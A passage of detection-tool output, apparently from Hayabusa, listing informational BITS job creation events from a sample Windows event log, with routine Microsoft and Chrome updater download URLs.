PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job 
Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.267 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 
00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job 
Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification 
Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: 
http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
